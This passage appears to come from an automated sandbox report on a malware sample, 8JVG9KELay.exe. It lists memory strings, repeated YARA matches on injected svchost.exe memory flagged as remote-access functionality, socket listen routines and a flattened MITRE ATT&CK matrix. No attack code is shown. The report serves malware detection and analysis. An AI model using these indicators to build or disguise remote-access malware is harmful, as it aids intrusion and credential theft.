                Source: 8JVG9KELay.exeBinary or memory string: WIN_VISTA
                Source: 8JVG9KELay.exeBinary or memory string: WIN_7
                Source: 8JVG9KELay.exeBinary or memory string: WIN_8
                Source: 8JVG9KELay.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00856596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00856596
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00856A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00856A5A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                4
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                Software Packing
                NTDS137
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets141
                Security Software Discovery
                SSH3
                Clipboard Data
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Valid Accounts
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.